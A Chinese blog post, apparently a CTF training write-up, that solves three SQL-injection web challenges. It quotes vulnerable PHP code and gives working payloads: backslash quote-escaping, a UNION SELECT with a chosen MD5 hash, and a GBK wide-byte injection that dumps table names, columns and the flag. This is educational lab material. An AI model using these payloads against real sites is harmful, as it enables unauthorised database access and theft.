百度360必应搜狗淘宝本站头条
当前位置:网站首页 > 技术分析 > 正文

【Web-南邮CTF】Web-CTF入门第6天

liebian365 2024-11-20 18:25 16 浏览 0 评论

【黑客笔记--7天入门南邮CTF-WEB篇】


SQL注入

查看页面源代码有下面的提示信息

先看clean函数做了什么 直接干掉了引号啊 \' ==> '

function clean($str){
	if(get_magic_quotes_gpc()){
		$str=stripslashes($str);
	}
	return htmlentities($str, ENT_QUOTES);
}

$username = @clean((string)$_GET['username']);
$password = @clean((string)$_GET['password']);

$query='SELECT * FROM users WHERE name=\''.$username.'\' AND pass=\''.$password.'\';';
$result=mysql_query($query);
if(!$result || mysql_num_rows($result) < 1){
	die('Invalid password!');
}

echo $flag;

分析一下SQL语句 一般来说注入的思路就是#截断SQL语句的password字段

'SELECT * FROM users WHERE name=\''.$username.'\' AND pass=\''.$password.'\';'

展开看是下面这样的结构

SELECT * FROM users WHERE name=

\' $username \'

AND pass=

\' $password \';

看看代码 靠闭合' 的思路是行不通了 为什么呢?因为\'会被转义 思路就是如何打破\'的束缚 方案就是干掉username后面的\' 让一个AND结构变成OR 结构 结果如下

SELECT * FROM users WHERE name=

\' admin\ \'

AND pass=

\' or 1=1# \';


SQL注入第2题

提示考察union的用法 要求输入的userpass要和数据库中的相同才算通过 靠猜是不可能的 那么直接通过POST请求体中输入的user打乱SQL语句吧

<?php
if($_POST[user] && $_POST[pass]) {
  mysql_connect(SAE_MYSQL_HOST_M . ':' . SAE_MYSQL_PORT,SAE_MYSQL_USER,SAE_MYSQL_PASS);
  mysql_select_db(SAE_MYSQL_DB);
  $user = $_POST[user];
  $pass = md5($_POST[pass]);
  $query = @mysql_fetch_array(mysql_query("select pw from ctf where user='$user'"));
  if (($query[pw]) && (!strcasecmp($pass, $query[pw]))) {
      echo "<p>Logged in! Key: ntcf{**************} </p>";
  }
  else {
    echo("<p>Log in failure!</p>");
  }
}
?>

首先我们拿到pass=hackbijimd5也就是add0ca38fedfc9e173d676deeca7e0e7

root@gt:~/Codes# php 8.php 
add0ca38fedfc9e173d676deeca7e0e7
root@gt:~/Codes# cat 8.php
<?php
$pass = 'hackbiji';
echo md5($pass)."\n";
?>

原始SQL语句 "select pw from ctf where user='$user'"

输入

user = -1' union select 'add0ca38fedfc9e173d676deeca7e0e7'# 或者

-1' union select 'add0ca38fedfc9e173d676deeca7e0e7

pass = hackbiji

最终的效果如下

select pw from ctf where user=' -1' union select 'add0ca38fedfc9e173d676deeca7e0e7'


宽字节注入

SQL注入经常使用'闭合SQL语句 如下测试 我们发现'被转义成\' 我们需要吃掉\

在我的【前端黑客】XSS入门 文章中有介绍宽字节问题

爆破数据库名:

id=%ef%27%20union%20select%201,database()%23

your sql:select id,title from news where id = '颸' union select 1,database()#'

拿到结果:sae-chinalover 对应16进制:0x7361652d6368696e616c6f766572


爆破数据库sae-chinalover的所有表名:

id=%ef%27%20union%20select%20group_concat(table_name),group_concat(table_name)%20from%20information_schema.tables%20where%20table_schema=0x7361652d6368696e616c6f766572%23

your sql:select id,title from news where id = '颸' union select group_concat(table_name),group_concat(table_name) from information_schema.tables where table_schema=0x7361652d6368696e616c6f766572#'

拿到结果:ctf,ctf2,ctf3,ctf4,news

对应的16进制:0x637466 0x63746632 0x63746633 0x63746634 0x6e657773


爆破表ctf4的所有列名:

id=%ef%27%20union%20select%20group_concat(column_name),group_concat(column_name)%20from%20information_schema.columns%20where%20table_name=0x63746634%23

your sql:select id,title from news where id = '颸' union select group_concat(column_name),group_concat(column_name) from information_schema.columns where table_name=0x63746634#'

拿到结果:id,flag


爆破表ctf4flag列的数据

id=%ef%27%20union%20select%20flag,flag%20from%20ctf4%23

your sql:select id,title from news where id = '颸' union select flag,flag from ctf4#'

拿到结果:nctf{gbk_3sqli}


相关推荐

4万多吨豪华游轮遇险 竟是因为这个原因……

(观察者网讯)4.7万吨豪华游轮搁浅,竟是因为油量太低?据观察者网此前报道,挪威游轮“维京天空”号上周六(23日)在挪威近海发生引擎故障搁浅。船上载有1300多人,其中28人受伤住院。经过数天的调...

“菜鸟黑客”必用兵器之“渗透测试篇二”

"菜鸟黑客"必用兵器之"渗透测试篇二"上篇文章主要针对伙伴们对"渗透测试"应该如何学习?"渗透测试"的基本流程?本篇文章继续上次的分享,接着介绍一下黑客们常用的渗透测试工具有哪些?以及用实验环境让大家...

科幻春晚丨《震动羽翼说“Hello”》两万年星间飞行,探测器对地球的最终告白

作者|藤井太洋译者|祝力新【编者按】2021年科幻春晚的最后一篇小说,来自大家喜爱的日本科幻作家藤井太洋。小说将视角放在一颗太空探测器上,延续了他一贯的浪漫风格。...

麦子陪你做作业(二):KEGG通路数据库的正确打开姿势

作者:麦子KEGG是通路数据库中最庞大的,涵盖基因组网络信息,主要注释基因的功能和调控关系。当我们选到了合适的候选分子,单变量研究也已做完,接着研究机制的时便可使用到它。你需要了解你的分子目前已有哪些...

知存科技王绍迪:突破存储墙瓶颈,详解存算一体架构优势

智东西(公众号:zhidxcom)编辑|韦世玮智东西6月5日消息,近日,在落幕不久的GTIC2021嵌入式AI创新峰会上,知存科技CEO王绍迪博士以《存算一体AI芯片:AIoT设备的算力新选择》...

每日新闻播报(September 14)_每日新闻播报英文

AnOscarstatuestandscoveredwithplasticduringpreparationsleadinguptothe87thAcademyAward...

香港新巴城巴开放实时到站数据 供科技界研发使用

中新网3月22日电据香港《明报》报道,香港特区政府致力推动智慧城市,鼓励公私营机构开放数据,以便科技界研发使用。香港运输署21日与新巴及城巴(两巴)公司签署谅解备忘录,两巴将于2019年第3季度,开...

5款不容错过的APP: Red Bull Alert,Flipagram,WifiMapper

本周有不少非常出色的app推出,鸵鸟电台做了一个小合集。亮相本周榜单的有WifiMapper's安卓版的app,其中包含了RedBull的一款新型闹钟,还有一款可爱的怪物主题益智游戏。一起来看看我...

Qt动画效果展示_qt显示图片

今天在这篇博文中,主要实践Qt动画,做一个实例来讲解Qt动画使用,其界面如下图所示(由于没有录制为gif动画图片,所以请各位下载查看效果):该程序使用应用程序单窗口,主窗口继承于QMainWindow...

如何从0到1设计实现一门自己的脚本语言

作者:dong...

三年级语文上册 仿写句子 需要的直接下载打印吧

描写秋天的好句好段1.秋天来了,山野变成了美丽的图画。苹果露出红红的脸庞,梨树挂起金黄的灯笼,高粱举起了燃烧的火把。大雁在天空一会儿写“人”字,一会儿写“一”字。2.花园里,菊花争奇斗艳,红的似火,粉...

C++|那些一看就很简洁、优雅、经典的小代码段

目录0等概率随机洗牌:1大小写转换2字符串复制...

二年级上册语文必考句子仿写,家长打印,孩子照着练

二年级上册语文必考句子仿写,家长打印,孩子照着练。具体如下:...

一年级语文上 句子专项练习(可打印)

...

亲自上阵!C++ 大佬深度“剧透”:C++26 将如何在代码生成上对抗 Rust?

...

取消回复欢迎 发表评论: